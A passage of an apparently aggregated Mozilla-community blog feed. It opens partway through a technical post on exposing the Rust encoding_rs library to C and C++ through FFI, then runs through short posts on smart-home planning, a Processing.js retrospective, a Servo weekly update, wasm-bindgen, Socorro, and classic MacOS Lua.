For FFI, though, we need to allocate an unchanging memory location to a pointer to UTF_8_INIT, because such memory locations work in C linkage and allow us provide a pointer-typed named thing to C. The representation of UTF_8 above is already what we need, but for Rust ergonomics, we want UTF_8 to participate in Rust’s crate namespacing. This means that from the C perspective the name gets mangled. We waste some space by statically allocating pointers again without name mangling for C usage:

pub struct ConstEncoding(*const Encoding);

unsafe impl Sync for ConstEncoding {}

#[no_mangle]
pub static UTF_8_ENCODING: ConstEncoding =
    ConstEncoding(&UTF_8_INIT);

A pointer type is used to make in clear that C is supposed to see a pointer (even if a Rust reference type would have the same representation). However, the Rust compiler refuses to compile a program with globally-visible pointer. Since globals are reachable from different threads, multiple threads accessing the pointee might be problem. In this case, the pointee cannot be mutated, so global visibility is fine. To tell the compiler that this is fine, we need to implement the Sync marker trait for the pointer. However, traits cannot be implemented on pointer types. As a workaround, we create a newtype for *const Encoding. A newtype has the same representation as the type it wraps, but we can implement traits on the newtype. Implementing Sync is unsafe, because we are asserting to the compiler that something is OK when the compiler does not figure it out on its own.

In C++, we can then say (what via macros expands to):

extern "C" {
    extern gsl::not_null<const encoding_rs::Encoding*> const UTF_8_ENCODING;
}

The pointers to the encoders and decoders are also known not to be null, since allocation failure would terminate the program, but std::unique_ptr / mozilla::UniquePtr and gsl::not_null / mozilla::NotNull cannot be combined.

Optional Values

In Rust, it’s idiomatic to use Option<T> to represent return values might either have a value or might not have a value. C++ these days provides the same thing as std::optional<T>. In Gecko, we instead have mozilla::Maybe<T>.

Rust’s Option<T> and C++’s std::optional<T> indeed are basically the same thing:

return None;
return std::nullopt;
return Some(foo);
return foo;
is_some()
operator bool()
has_value()
unwrap()
value()
unwrap_or(bar)
value_or(bar)

Unfortunately, though, C++ reverses the safety ergonomics. The most ergonomic way to extract the wrapped value from a std::optional<T> is via operator*(), which is unchecked and, therefore, unsafe. 😭

Multiple Return Values

While C++ lacks language-level support for multiple return values, multiple return values are possible thanks to library-level support. In the case of the standard library, the relevant library pieces are std::tuple, std::make_tuple and std::tie. In the case of Gecko, the relevant library pieces are mozilla::Tuple, mozilla::MakeTuple and mozilla::Tie.

fn foo() -> (T, U, V)
std::tuple<T, U, V> foo()
return (a, b, c);
return {a, b, c};
let (a, b, c) = foo();
const auto [a, b, c] = foo();
let mut (a, b, c) = foo();
auto [a, b, c] = foo();
Slices

A Rust slice wraps a non-owning pointer and a length that identify a contiguous part of an array. In comparison to C:

src: &[u8]
const uint8_t* src, size_t src_len
dst: &mut [u8]
uint8_t* dst, size_t dst_len

There isn’t a corresponding thing in the C++ standard library yet (except std::string_view for read-only string slices), but it’s already part of the C++ Core Guidelines and is called a span there.

src: &[u8]
gsl::span<const uint8_t> src
dst: &mut [u8]
gsl::span<uint8_t> dst
&mut vec[..]
gsl::make_span(vec)
std::slice::from_raw_parts(ptr, len)
gsl::make_span(ptr, len)
for item in slice {}
for (auto&& item : span) {}
slice[i]
span[i]
slice.len()
span.size()
slice.as_ptr()
span.data()

GSL relies on C++14, but at the time encoding_rs landed, Gecko was stuck on C++11 thanks to Android. Since, GSL could not be used as-is in Gecko, I backported gsl::span to C++11 as mozilla::Span. The porting process was mainly a matter of ripping out constexpr keywords and using mozilla:: types and type traits in addition to or instead of standard-library ones. After Gecko moved to C++14, some of the constexpr keywords have been restored.

Once we had our own mozilla::Span anyway, it was possible to add Rust-like subspan ergonomics that are missing from gsl::span. For the case where you want a subspan from index i up to but not including index j. gsl::span has:

&slice[i..]
span.subspan(i)
&slice[..i]
span.subspan(0, i)
&slice[i..j]
span.subspan(i, j - i) 😭

mozilla::Span instead has:

&slice[i..]
span.From(i)
&slice[..i]
span.To(i)
&slice[i..j]
span.FromTo(i, j)

gsl::span and Rust slices have one crucial difference in how they decompose into a pointer and a length. For zero-length gsl::span it is possible for the pointer to be nullptr. In the case of Rust slices, the pointer must always be non-null and aligned even for zero-length slices. This may look counter-intuitive at first: When the length is zero, the pointer never gets dereferenced, so why doesn’t matter whether it is null are not? It turns out that it matters for optimizing out the enum discriminant in Option-like enums. None is represented by all-zero bits, so if wrapped in Some(), a slice with null as the pointer and zero as the length would accidentally have the same representation as None. By requiring the pointer to be a potentially bogus non-null pointer, a zero-length slice inside an Option can be represented distinctly from None without a discriminant. By requiring the pointer to be aligned, further uses of the low bits of the pointer are possible when the alignment of the slice element type is greater than one.

After realizing that it’s not okay to pass the pointer obtained from C++ gsl::span::data() to Rust std::slice::from_raw_parts() as-is, it was necessary to decide where to put the replacement of nullptr with reinterpret_cast<T*>(alignof(T)). There are two candidate locations when working with actual gsl::span: In the Rust code that provides the FFI or in the C++ code that calls the FFI. When working with mozilla::Span, the code of the span implementation itself could be changed, so there are two additional candidate locations for the check: the constructor of mozilla::Span and the getter for the pointer.

Of these for candidate locations, the constructor of mozilla::Span seemed like the one where the compiler has the best opportunity to optimize out the check in some cases. That’s why I chose to put the check there. This means that in the gsl::span scenario the check had to go in the code that calls the FFI. All pointers obtained from gsl::span have to be laundered through:

template <class T>
static inline T* null_to_bogus(T* ptr)
{
    return ptr ? ptr : reinterpret_cast<T*>(alignof(T));
}

Additionally, this means that since the check is not in the code that provides the FFI, the C API became slightly unidiomatic in the sense that requires C callers to avoid passing in NULL even when the length is zero. However, the C API already has many caveats about things that are Undefined Behavior, and adding yet another thing that is documented to be Undefined Behavior does seem like an idiomatic thing to do with C.

Putting it Together

Let’s look at an example of how the above features combine. First, in Rust we have a method that takes a slice and returns an optional tuple:

impl Encoding {
    pub fn for_bom(buffer: &[u8]) ->
        Option<(&'static Encoding, usize)>
    {
        if buffer.starts_with(b"\xEF\xBB\xBF") {
            Some((UTF_8, 3))
        } else if buffer.starts_with(b"\xFF\xFE") {
            Some((UTF_16LE, 2))
        } else if buffer.starts_with(b"\xFE\xFF") {
            Some((UTF_16BE, 2))
        } else {
            None
        }
    }
}

Since this is a static method, there is no reference to self and no corresponding pointer in the FFI function. The slice decomposes into a pointer and a length. The length becomes an in/out param that communicates the length of the slice in and the length of the BOM sublice out. The encoding becomes the return value and the encoding pointer being null communicates the Rust None case for the tuple.

#[no_mangle]
pub unsafe extern "C" fn encoding_for_bom(buffer: *const u8,
                                          buffer_len: *mut usize)
                                          -> *const Encoding
{
    let buffer_slice =
        ::std::slice::from_raw_parts(buffer, *buffer_len);
    let (encoding, bom_length) =
        match Encoding::for_bom(buffer_slice) {
        Some((encoding, bom_length)) =>
            (encoding as *const Encoding, bom_length),
        None => (::std::ptr::null(), 0),
    };
    *buffer_len = bom_length;
    encoding
}

In the C header, the signature looks like this:

ENCODING_RS_ENCODING const*
encoding_for_bom(uint8_t const* buffer, size_t* buffer_len);

The C++ layer then rebuilds the analog of the Rust API on top of the C API:

class Encoding final {
public:
    static inline std::optional<
        std::tuple<gsl::not_null<const Encoding*>, size_t>>
    for_bom(gsl::span<const uint8_t> buffer)
    {
        size_t len = buffer.size();
        const Encoding* encoding =
            encoding_for_bom(null_to_bogus(buffer.data()), &len);
        if (encoding) {
            return std::make_tuple(
                gsl::not_null<const Encoding*>(encoding), len);
        }
        return std::nullopt;
    }
};

Here we have to exlicitly use std::make_tuple, because the implicit constructor doesn’t work when the std::tuple is nested inside std::optional.

Algebraic Types

Early on, we saw that the Rust-side streaming API can return this enum:

pub enum DecoderResult {
    InputEmpty,
    OutputFull,
    Malformed(u8, u8),
}

C++ now has an analog for Rust enum, sort of: std::variant<Types...>. In practice, though, std::variant is so clunky that it does not make sense to use it when a Rust enum is supposed to act in a lightweight way from the point view of ergonomics.

First, the variants in std::variant aren’t named. They are identified positionally or by type. Named variants were proposed as proposed as lvariant but did not get accepted. Second, even though duplicate types are permitted, working with them is not practical. Third, there is no language-level analog for Rust’s match. A match-like mechanism was proposed as inspect() but was not accepted.

On the FFI/C layer, the information from the above enum is packed into a u32. Instead of trying to expand it to something fancier on the C++ side, the C++ API uses the same uint32_t as the C API. If the caller actually cares about extracting the two small integers in the malformed case, it’s up to the caller to do the bitwise ops to extract them from the uint32_t.

The FFI code looks like this:

pub const INPUT_EMPTY: u32 = 0;

pub const OUTPUT_FULL: u32 = 0xFFFFFFFF;

fn decoder_result_to_u32(result: DecoderResult) -> u32 {
    match result {
        DecoderResult::InputEmpty => INPUT_EMPTY,
        DecoderResult::OutputFull => OUTPUT_FULL,
        DecoderResult::Malformed(bad, good) =>
            (good as u32) << 8) | (bad as u32),
    }
}

Using zero as the magic value for INPUT_EMPTY is a premature micro-optimization. On some architectures comparison with zero is cheaper than comparison with other constants, and the values representing the malformed case when decoding and the unmappable case when encoding are known not to overlap zero.

Signaling Integer Overflow

Decoder and Encoder have methods for querying worst-case output buffer size requirement. The caller provides the number of input code units and the method returns the smallest output buffer length, in code units, that guarantees that the corresponding conversion method will not return OutputFull.

E.g. when encoding from UTF-16 to UTF-8, calculating the worst case involves multiplication by three. Such a calculation can, at least in principle, result in integer overflow. In Rust, integer overflow is considered safe, because even if you allocate too short a buffer as a result of its length computation overflowing, actually accessing the buffer is bound checked, so the overall result is safe. However, buffer access is not generally bound checked in C or C++, so an integer overflow in Rust can result in memory unsafety in C or C++ if the result of the calculation that overflowed is used for deciding the size of buffers allocated and accessed by C or C++ code. In the case of encoding_rs, even when C or C++ allocates the buffer, the writing is supposed to be performed by Rust code, so it might be OK. However, to be sure, the worst-case calculations provided by encoding_rs used overflow-checking arithmetic.

In Rust, the methods whose arithmetic is overflow-checked return Option<usize>. To keep the types of the C API simple, the C API returns size_t with SIZE_MAX signaling overflow. That is, the C API effectively appears as using saturating arithmetic.

In the C++ API version that uses standard-library types, the return type is std::optional<size_t>. In Gecko, we have a wrapper for integer types that provides overflow-checking arithmetic and a validity flag. In the Gecko version of the C++ API, the return type is mozilla::CheckedInt<size_t> so that dealing with overflow signaling is uniform with the rest of Gecko code. (Aside: I find it shocking and dangerous that the C++ standard library still does not provide a wrapper similar to mozilla::CheckedInt in order to do overflow-checking integer math in a standard-supported Undefined Behavior-avoiding way.)

Recreating the Non-Streaming API

Let’s look again at the example of a non-streaming API method on Encoding:

impl Encoding {
    pub fn decode_without_bom_handling_and_without_replacement<'a>(
        &'static self,
        bytes: &'a [u8],
    ) -> Option<Cow<'a, str>>
}

This type inside the Option in the return type is Cow<'a, str>, which is a type that holds either an owned String or a borrowed string slice (&'a str) whose data is owned by someone else. The lifetime 'a of the borrowed string slice is the lifetime of the input slice (bytes: &'a [u8]), because in the borrow case the output is actually borrowed from the input.

Mapping this kind of return type to C poses problems. First of all, C does not provide a great way to say that we either have the owned case or we have the borrowed case. Second, C does not have a standard type for heap-allocated strings that know their length and capacity and that can reallocate their buffer when modified. Maybe this could be seen as an opportunity to create a new C type whose buffer is managed by Rust String, but then such a type would not fit together with C++ strings. Third, a borrowed string slice in C would be a raw pointer and a length and some documentation that says that the pointer is valid only as long as the input pointer is valid. There would be no language-level safeguards against use-after-free.

The solution is not to provide the non-streaming API on the C layer at all. On the Rust side, the non-streaming API is a convenience API built on top of the streaming API and some validation functions (ASCII validation, UTF-8 validation, ISO-2022-JP ASCII state validation). Instead of trying to provide FFI bindings for the non-streaming API in an inconvenient manner, a similar non-streaming API can be recreated in C++ on top of the streaming API and the validation functions that were suitable for FFI.

While the C++ type system could represent the same kind of structure as Rust’s Cow<'a, str> e.g. as std::variant<std::string_view, std::string>, such a C++ Cow would be unsafe, because the lifetime 'a would not be enforced by C++. While a std::string_view (or gsl::span) is (mostly) OK as an argument in C++, as a return type it’s use-after-free waiting to happen. As with C, at best there would be some documentation saying that the output std::string_view is valid for as long as the input gsl::span is valid.

To avoid use-after-free risk, in the C++ API version that uses C++17 standard-library types, I simply ended up making the C++ decode_without_bom_handling_and_without_replacement() always copy and return a std::optional<std::string>.

In the case of Gecko though, it’s possible to do better while keeping things safe. Gecko uses XPCOM strings, which provide a variety of storage options, notably: dependent strings that (unsafely) borrow storage owned by someone else, auto strings that store short strings in an inline buffer and shared strings that point to heap-allocated reference-counted buffer.

In the case where the buffer to decode is in an XPCOM string that points to a reference-counted heap-allocated buffer and we are decoding to UTF-8 (as opposed to UTF-16), in the cases where we’d borrow in Rust (expect for BOM removal cases), we can instead make the output string point the same reference-counted heap-allocated buffer that the input points to (and increment the reference count). This is indeed what the non-streaming API for mozilla::Encoding does.

Compared to Rust, there is a limitation beyond the input string having to use reference-counted storage for the copy avoidance to work: The input must not have the UTF-8 BOM in the cases where the BOM is removed. While Rust can borrow a subslice of the input excluding the BOM, with XPCOM strings just incrementing a reference count only works if the byte content of the input and output is the entirely the same. When the first three bytes need to be omitted, it’s not the entirely the same.

While the C++ API version that uses C++17 standard library types builds the non-streaming API on top of the streaming API in C++, for added safety, the non-streaming part of mozilla::Encoding is not actually built on the streaming C++ API in C++ but built on top of the streaming Rust API in Rust. In Gecko, we have Rust bindings for XPCOM strings, so it’s possible to manipulate XPCOM strings from Rust.

Epilog: Do We Really Need to Hold Decoder and Encoder by Pointer?

Apart from having to copy in the non-streaming API due to C++ not having a safe mechanism for borrows, it’s a bit disappointing that instantiating Decoder and Encoder from C++ involves a heap allocation while Rust callers get to allocate these types on the stack. Can we get rid of the heap allocation for C++ users of the API?

The answer is that we could, but to do it properly we’d end up with the complexity of making the C++ build system generate constants by querying them from rustc.

We can’t return a non-C-like struct over the FFI by value, but given a suitably-aligned pointer to enough memory, we can write a non-C-like struct to memory provided by the other side of the FFI. In fact, the API supports this as an optimization of instantiating a new Decoder into a heap allocation made by Rust previously:

#[no_mangle]
pub unsafe extern "C" fn encoding_new_decoder_into(
    encoding: *const Encoding,
    decoder: *mut Decoder)
{
    *decoder = (*encoding).new_decoder();
}

Even though documentation says that encoding_new_decoder_into() should only be used with pointers to Decoder previously obtained from the API, in the case of Decoder, assigning with = would be OK even if the memory pointed to by the pointer was uninitialized, because Decoder does not implement Drop. That is, in C++ terms, Decoder in Rust does not have a destructor, so assignment with = does not do any clean-up with the assumption that the pointer points to a previous valid Decoder.

When writing a Rust struct that implements Drop into uninitialized memory, std::ptr::write() should be used instead of =. std::ptr::write() “overwrites a memory location with the given value without reading or dropping the old value”. Perhaps it would set a good example to use std::ptr::write() even in the above case, even though it’s not strictly necessary.

When working with a pointer previously obtained from Rust Box, the pointer is aligned correctly and points to a sufficiently large piece of memory. If C++ is to allocate stack memory for Rust code to write into, we need to make the C++ code use the right size and alignment. The issue of communicating these two numbers from Rust to C++ is already where things start getting brittle.

The C++ code needs to discover the right size and alignment for the struct. These cannot be discovered by calling FFI functions, because C++ needs to know them at compile time. Size and alignment aren’t just constants that could be written manually in a header file once and forgotten. First of all, they change when the Rust structs change, so just writing them down has the risk of the written-down values getting out of sync with the real requirements as the Rust code changes. Second, the values differ on 32-bit architectures vs. 64-bit architectures. Third, and this is the worst, the alignment can differ from one 32-bit architecture to another. Specifically, the alignment of f64 is 8 on most targets, like ARM, MIPS and PowerPC, but the alignment of f64 is 4 on x86. If Rust gets an m68k port, even more variety of alignments across 32-bit platforms is to be expected.

It seems that the only way to get this right is to get the size and alignment information from rustc as part of the build process before the C++ code is built so that the numbers can be written in a generated C++ header file that the C++ code can then refer to. The simple way to do this would be to have the build system compile and run a tiny Rust program that prints out a C++ header with numbers obtained using std::mem::size_of and std::mem::align_of. This solution assumes that the build system runs on the architecture that the compilation is targeting, so this solution would break cross-compilation. That’s not good.

We need to extract target-specific size and alignment from a given struct from rustc but without having to run a binary built for the target. It turns out that rustc has a command-line option, -Zprint-type-sizes, that prints out the size and alignment of types. Unfortunately, the feature is nightly-only… Anyway, the most correct way to go about this would be to have a build script controlling C++ compilation first invoke rustc with that option, parse out the sizes and aligments of interest, and generate a C++ header file with the numbers as constants.

Or, since overaligning is permitted, we could trust that the struct will not have a SIMD member (alignment 16 for 128-bit vectors) and always align to 8. We could also check the size on 64-bit platforms, always use that and hope for the best (especially hope that whenever the struct grows in Rust, someone remembers to update the C++-visible size). But hoping for the best in memory matters kind of defeats the point of using Rust.

Anyway, assuming that we have constants DECODER_SIZE and DECODER_ALIGNMENT available to C++ somehow, we can do this:

class alignas(DECODER_ALIGNMENT) Decoder final
{
  friend class Encoding;
public:
  ~Decoder() {}
  Decoder(Decoder&&) = default;
private:
  unsigned char storage[DECODER_SIZE];
  Decoder() = default;
  Decoder(const Decoder&) = delete;
  Decoder& operator=(const Decoder&) = delete;
  // ...
};

Notably:

  • Instead of the constructor Decoder() being marked delete, it is marked default but still private.
  • Encoding is declared as a friend to grant it access to the above-mentioned constructor.
  • A public default move constructor is added.
  • A single private field of type unsigned char[DECODER_SIZE] is added.
  • Decoder itself is declared with alignas(DECODER_ALIGNMENT).
  • operator delete is no longer overloaded.

Then new_decoder() on Encoding can be written like this (and be renamed make_decoder to avoid unidiomatic use of the word “new” in C++):

class Encoding final
{
public:
  inline Decoder make_decoder() const
  {
    Decoder decoder;
    encoding_new_decoder_into(this, &decoder);
    return decoder;
  }
  // ...
};

And it can be used like this:

Decoder decoder = input_encoding->make_decoder();

Note that outside the implementation of Encoder trying to just declare Decoder decoder; without initializing it right away initializing is a compile-time error, because the constructor Decoder() is private.

Let’s unpack what’s happening:

  • The array of unsigned char provides storage for the Rust Decoder.
  • The C++ Decoder has no base class, virtual methods, etc., so there are no implementation-supplied hidden members and the address of a Decoder is the same as the address of its storage member, so we can simply pass the address of Decoder itself to Rust.
  • The alignment of unsigned char is 1, i.e. unrestricted, so alignas on the Decoder gets to determine the alignment.
  • The default trivial move constructor memmoves the bytes of the Decoder, and the Rust Decoder is OK to move.
  • The private default no-argument constructor makes it a compile error to try to declare a not-immediately-initialized instance of the C++ Decoder outside the implementation of Encoder.
  • Encoder, however, can instantiate an uninitialized Decoder and pass a pointer to it to Rust, so that Rust code can write the Rust Decoder instance into the C++-provided memory via the pointer.

Daniel PocockSmart home: where to start?

My home automation plans have been progressing and I'd like to share some observations I've made about planning a project like this, especially for those with larger houses.

With so many products and technologies, it can be hard to know where to start. Some things have become straightforward, for example, Domoticz can soon be installed from a package on some distributions. Yet this simply leaves people contemplating what to do next.

The quickstart

For a small home, like an apartment, you can simply buy something like the Zigate, a single motion and temperature sensor, a couple of smart bulbs and expand from there.

For a large home, you can also get your feet wet with exactly the same approach in a single room. Once you are familiar with the products, use a more structured approach to plan a complete solution for every other space.

The Debian wiki has started gathering some notes on things that work easily on GNU/Linux systems like Debian as well as Fedora and others.

Prioritize

What is your first goal? For example, are you excited about having smart lights or are you more concerned with improving your heating system efficiency with zoned logic?

Trying to do everything at once may be overwhelming. Make each of these things into a separate sub-project or milestone.

Technology choices

There are many technology choices:

  • Zigbee, Z-Wave or another protocol? I'm starting out with a preference for Zigbee but may try some Z-Wave devices along the way.
  • E27 or B22 (Bayonet) light bulbs? People in the UK and former colonies may have B22 light sockets and lamps. For new deployments, you may want to standardize on E27. Amongst other things, E27 is used by all the Ikea lamp stands and if you want to be able to move your expensive new smart bulbs between different holders in your house at will, you may want to standardize on E27 for all of them and avoid buying any Bayonet / B22 products in future.
  • Wired or wireless? Whenever you take up floorboards, it is a good idea to add some new wiring. For example, CAT6 can carry both power and data for a diverse range of devices.
  • Battery or mains power? In an apartment with two rooms and less than five devices, batteries may be fine but in a house, you may end up with more than a hundred sensors, radiator valves, buttons, and switches and you may find yourself changing a battery in one of them every week. If you have lodgers or tenants and you are not there to change the batteries then this may cause further complications. Some of the sensors have a socket for an optional power supply, battery eliminators may also be an option.

Making an inventory

Creating a spreadsheet table is extremely useful.

This helps estimate the correct quantity of sensors, bulbs, radiator valves and switches and it also helps to budget. Simply print it out, leave it under the Christmas tree and hope Santa will do the rest for you.

Looking at my own house, these are the things I counted in a first pass:

Don't forget to include all those unusual spaces like walk-in pantries, a large cupboard under the stairs, cellar, en-suite or enclosed porch. Each deserves a row in the table.

Sensors help make good decisions

Whatever the aim of the project, sensors are likely to help obtain useful data about the space and this can help to choose and use other products more effectively.

Therefore, it is often a good idea to choose and deploy sensors through the home before choosing other products like radiator valves and smart bulbs.

The smartest place to put those smart sensors

When placing motion sensors, it is important to avoid putting them too close to doorways where they might detect motion in adjacent rooms or hallways. It is also a good idea to avoid putting the sensor too close to any light bulb: if the bulb attracts an insect, it will trigger the motion sensor repeatedly. Temperature sensors shouldn't be too close to heaters or potential draughts around doorways and windows.

There are a range of all-in-one sensors available, some have up to six features in one device smaller than an apple. In some rooms this is a convenient solution but in other rooms, it may be desirable to have separate motion and temperature sensors in different locations.

Consider the dining and sitting rooms in my own house, illustrated in the floorplan below. The sitting room is also a potential 6th bedroom or guest room with sofa bed, the downstairs shower room conveniently located across the hall. The dining room is joined to the sitting room by a sliding double door. When the sliding door is open, a 360 degree motion sensor in the ceiling of the sitting room may detect motion in the dining room and vice-versa. It appears that 180 degree motion sensors located at the points "1" and "2" in the floorplan may be a better solution.

These rooms have wall mounted radiators and fireplaces. To avoid any of these potential heat sources the temperature sensors should probably be in the middle of the room.

This photo shows the proposed location for the 180 degree motion sensor "2" on the wall above the double door:

Summary

To summarize, buy a Zigate and a small number of products to start experimenting with. Make an inventory of all the products potentially needed for your home. Try to mark sensor locations on a floorplan, thinking about the type of sensor (or multiple sensors) you need for each space.

David HumphreyProcessing.js 2008-2018

Yesterday Pomax DM'ed me on Twitter to let me know he'd archived the Processing.js GitHub repo. He's been maintaining it mostly on his own for quite a while, and now with the amazing p5js project, there isn't really a need to keep it going.

I spent the rest of the day thinking back over the project, and reflecting on what it meant to me. Like everyone else in May 2008, I was in awe when John Resig wrote his famous reverse birthday present blog post, showing the world what he'd been hacking together:

I've decided to release one of my largest projects, in recent memory. Processing.js is the project that I've been alluding to for quite some time now. I've ported the Processing visualization language to JavaScript, using the Canvas element. I've been working on this project, off-and-on now, for the past 7 months.

It was nothing short of epic. I had followed the development of Processing since I was an undergrad. I remember stumbling into the aesthetics + computation group website at MIT in my first year, and becoming aware of the work of Ben Fry, John Maeda, Casey Reas and others. I was smitten. As a student studying both humanities and CS, I didn't know anyone else who loved computers and art, and here was an entire lab devoted to it. For many years thereafter, I followed along from afar, always amazed at the work people there were doing.

Then, in the fall of 2009, as part of my work with Mozilla, Chris Blizzard approached me about helping Al MacDonald (f1lt3r) to work on getting Processing.js to 1.0, and adding the missing 3D API via WebGL. In the lead-up to Firefox 3.7, Mozilla was interested in getting more canvas based tech on the web, and in finding performance and other bugs in canvas and WebGL. Processing.js, they thought, would help to bring a community of artists, designers, educators, and other visual coders to the web.

Was I interested!? Here was a chance to finally work alongside some of my technical heroes, and to get to contribute to a space I'd only ever looked at from the other side of the glass. "Yes, I'm interested." I remember getting my first email from Ben, who started to explain what Processing was--I didn't need any introductions.

That term I used Processing.js as the main open source project in my open source class. As Al and I worked on the code, I taught the students how things worked, and got them fixing small bugs. The code was not the easiest first web project for students: take a hybrid of Java and make it work, unmodified, in the browser, using DOM and canvas APIs. This was before transpilers, node, and the current JS ecosystem. If you want to learn the web though, there was no better way than to come at it from underneath like this.

I had an energetic group of students with a nice set of complimentary skills. A few had been working with Vlad on 3D in the browser for a while, as he developed what would become WebGL. Andor Salga, Anna Sobiepanek, Daniel Hodgin, Scott Downe, Jon Buckley, and others would go on to continue working on it with me in our open source lab, CDOT.

Through 2009-11 we worked using the methods I'd learned from Mozilla: open bug tracker, irc, blogs, wikis, weekly community calls, regular dot-releases.

Because we were working in the open, and because the project had such an outsized reputation thanks to the intersections of "Ben & Casey" and Resig, all kinds of random (and amazing) people showed up in our irc channel. Every day someone new from the who's who of design, graphics, gaming, and the digital art worlds would pop in to show us a demo that had a bug, or to ask a question about how to make something work. I spent most of my time helping people debug things, and writing tests to put back into the project for performance issues, parser bugs, and API weirdness.

One day a musician and digital artist named Corban Brook showed up. He used Processing in his work, and was interested to help us fix some things he'd found while porting an old project. He never left. Over the months he'd help us rewrite huge amounts of the code, taught us git, and become a big brother to many of the students. I learned a ton from him about git and JS.

Then there was the time this mathematician came into the channel, complaining about how poor our font code and bezier curve implementation. It turned out he knew what he was talking about, and we never let him leave either. Pomax would go on to become one of the most important maintainers on the project, and a long time friend.

Another time an unknown nickname, "notmasteryet," appeared. He started submitting massive pull requests, but never really said anything. At one point he rewrote our entire Java-to-JavaScript parser from scratch and magically fixed hundreds of bugs we couldn't solve. "notmasteryet" turned out to be Yury Delendik, who would go on to join Mozilla and build every cool thing you've seen the web do in the past 10 years (pdf.js, shumway to name a few).

Being part of this eclectic mix of hackers and artists was intoxicating. Whatever skill one of you lacked, others in the group had it. At one point, the conversation moved toward how to use the browser to mix audio and visuals with processing.js. I had no idea how sound worked, but I did understand how to hack into Gecko and get the data, Corban was a master with FFTs, Al knew how to make the visuals work, and Yury knew everything the rest of us didn't.

We set out to see if we could connect all the dots, and began hacking on a new branch of our code that used a version of Firefox I modified to emit audio events. Our work would eventually be shipped in Firefox 4 as the Audio Data API, and lead to what is now the standardization of the Web Audio AI. I still remember the first time we got all of our pieces working together in the browser, and Corban filmed it. Magic!

From there the group only got larger, and the ideas for processing.js more ambitious. With the addition of people like CJ and Bobby, we started building big demos for Mozilla, which doubled as massive performance tests for browsers trying to compete for speed with WebGL: Flight of the Navigator, No Comply. And these led to yet more browser APIs for gaming, like Pointer Lock and Gamepad.

Since then it's been amazing to watch all the places that processing.js has gone. Twitter has always been full of people discovering it, and sharing their work, not least because of John and Khan Academy using it there in their curriculum. Years later, I even got to use it there with my own children to teach them to code.

I truly loved working on processing.js, probably more than any other project I've done in the past 10 years. It was my favourite kind of software to build for a few reasons:

  • we were implementing Ben's spec. All of our tests and decisions were based on "what does p5 do?" The freedom not to have to decide, but to simply execute, was liberating.
  • we had an enormous amount of pre-existing code to test, and slowly make work. There's no way I could have built processing.js from zero. But I love porting everyone's existing projects.
  • the project was totally based on tests: unit tests, performance tests, visual snapshot/ref tests, parser tests. I learned how to think about code in terms of tests by working on Mozilla, but I learned to love tests through processing.js
  • it could be run without installing anything. Every time we made something new work, you just had to hit Refresh in your browser. That sounds so obvious, but for the community of Java devs coming to the web via processing.js, it was eye opening.
  • we could put time and attention into docs, examples, and guides. Casey and Ben had done so much of this, and we learned a lot from his approach and style.
  • it let me move up and down the web stack. I spent as much time working on performance issues in Firefox as I did in JavaScript. We found a ton of things in WebGL (I was even able to find and get a security bounty for a bug with TypedArrays). I remember once sitting with Boris Zbarsky in Boston, and having him teach me, slowly, how to figure out why our code was falling off of the JIT tracing, and how to fix it. Eventually we got back on JIT, thanks to bz :)

While it's definitely time for processing.js to be archived and other projects to take its place, I wanted to at least say a proper goodbye. I'm thankful I got to spend so many years working in the middle of it, and to have had the chance to work with such a creative part of the internet.

Thanks, too, to Pomax for keeping the lights on years after the rest of us had gone to other projects.

And to processing.js, goodnight. Thanks for all the unit tests.

The Servo BlogThis Week In Servo 120

In the past week, we merged 78 PRs in the Servo organization’s repositories.

Planning and Status

Our roadmap is available online, including the overall plans for 2018.

This week’s status updates are here.

Notable Additions

  • danlrobertson added a bunch of documentation to the ipc-channel crate.
  • myfreeweb added FreeBSD support to the gaol crate.
  • gterzian implemented a background hang monitor that reports the hung backtrace.
  • ferjm made blob URLs support range requests.
  • Darkspirit updated the SSL certificate generation mechanism.
  • nox worked around a Cargo bug causing unnecessarily long rebuilds when switching between build targets.
  • CYBAI enabled the automated Service Worker testsuite.
  • Manishearth fixed some bugs preventing WebVR from working in Google Daydream.
  • ferjm suppressed a crash when playing media while GStreamer is not installed correctly.
  • asajeffrey improved the Magic Leap UI some more.
  • jdm fixed a bug causing some cached images to not be displayed correctly.
  • jdm avoided an issue with reading certain HTTP responses from the cache leading to blank pages.

New Contributors

  • Shubham Kumaram

Interested in helping build a web browser? Take a look at our curated list of issues that are good for new contributors!

Nick Fitzgeraldwasm-bindgen — how does it work?!

A month or so ago I gave a presentation on the inner workings of wasm-bindgen to the WebAssembly Community Group. A particular focus was the way that wasm-bindgen is forward-compatible with, and acts as a sort of polyfill for, the host bindings proposal. A lot of this material was originally supposed to appear in my SFHTML5 presentation, but time constraints forced me to cut it out.

Unfortunately, the presentation was not recorded, but you can view the slide deck below, or open it in a new window. Navigate between slides with arrow keys or space bar.

Will Kahn-GreeneSocorro: November 2018 happenings

Summary

Socorro is the crash ingestion pipeline for Mozilla's products like Firefox. When Firefox crashes, the Breakpad crash reporter asks the user if the user would like to send a crash report. If the user answers "yes!", then the Breakpad crash reporter collects data related to the crash, generates a crash report, and submits that crash report as an HTTP POST to Socorro. Socorro saves the crash report, processes it, and provides an interface for aggregating, searching, and looking at crash reports.

November was another busy month! This blog post covers what happened.

Read more… (5 mins to read)

Cameron KaiserSomething for the weekend: Classic MacOS Lua

First, a TenFourFox FPR11 update: the release is delayed until December 10-ish to coincide with the updated release date of Firefox 66/60.4 ESR. Unfortunately due to my absence over the holidays this leaves very little development time for FPR12 in December, so the beta is not likely to emerge until mid-January. Issue 533 ("this is undefined") is still my biggest priority because of the large number of sites still using the tainted version of Uglify-ES, but I still have no solution figured out yet, and the 15-minutes-or-longer build time to reconstruct test changes in JavaScript if I touch any headers seriously slows debugging. If you've had issues with making new shipments in United Parcel Service's on-line shipping application, or getting into your Citibank account, this is that bug.

So in the meantime, since we're all classic Mac users here, try out MacLua, a new port of the Lua programming language to classic MacOS. I'm rather fond of Lua, which is an incredibly portable scripting language, ever since I learned it to write PalmOS applications in Plua (I maintained the Mac OS X cross-compiler for it). In fact, I still use Plua for my PalmOS-powered Hue light controller.

MacLua gives you a REPL which you can type Lua into and will run your Lua scripts, but it has two interesting features: first, you can use it as an MPW tool, and second, it allows plugins that could potentially connect it to the rest of the classic Mac Toolbox. The only included component is a simple one for querying Gestalt as an educational example, but a component for TCP sockets through MacTCP or OpenTransport or being able to display dialogue boxes and other kinds of system resources would seem like a logical next step. This was something really nice about Plua that it included GUI and network primitives built-in as included modules. The author of this port clearly has a similar idea in mind.

